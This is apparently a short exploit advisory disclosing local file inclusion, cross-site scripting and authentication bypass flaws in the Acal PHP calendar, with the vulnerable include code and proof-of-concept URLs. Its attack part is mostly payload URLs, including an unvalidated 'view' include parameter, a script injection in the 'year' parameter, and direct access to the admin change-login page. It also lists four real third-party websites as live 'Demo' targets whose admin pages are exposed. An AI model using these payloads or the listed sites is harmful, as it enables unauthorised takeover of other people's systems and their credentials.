[+] Author: TUNISIAN CYBER
[+] Exploit Title: Acal LFI/XSS/Auth Bypass Vulnerabilities
[+] Category: WebApp
[+] Google Dork: Use your mind
[+] Tested on: KaliLinux
[+] Vendor: https://acalproj.sourceforge.net/

 
########################################################################################

+Description:
A web based event calendar that does not require a database server. 
It is made to be easy to install and to be able to run on just about any typical ISP's server with PHP installed.
+Exploit:

Acal Suffers from an LFI,XSS and Auth Bypass vulnerabilities:

1/LFI:

File(s): example.php : Lines 24--30
Parameter:view
       
[PHP]
// DO NOT EDIT
if (!isset($_GET['view'])) {
  include $path . 'embed/' . $view . '.php';
}
else {
  include $path . 'embed/' . $_GET['view'] . '.php';
}
[PHP]

P.O.C:
127.0.0.1/calendar/embed/example/example.php?view=[LFI]

2/ XSS:
127.0.0.1/calendar/calendar.php?year=<script>alert(111)</script>
https://s13.postimg.org/u9bvlrg1i/www.jpg

3/Auth Bypass:
You can access directly to the admin panel and you can change login details:
127.0.0.1/calendar/admin/changelogin.php

Demo:
https://www.benifeade.com/i/calendar/admin/changelogin.php
https://www.diprove.unimi.it/calendar/admin/edit.php
https://tavernadeglieroi.altervista.org/calendar/admin/edit.php
https://www.davidcarrjr.com/CAL/calendar/admin/changelogin.php

./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################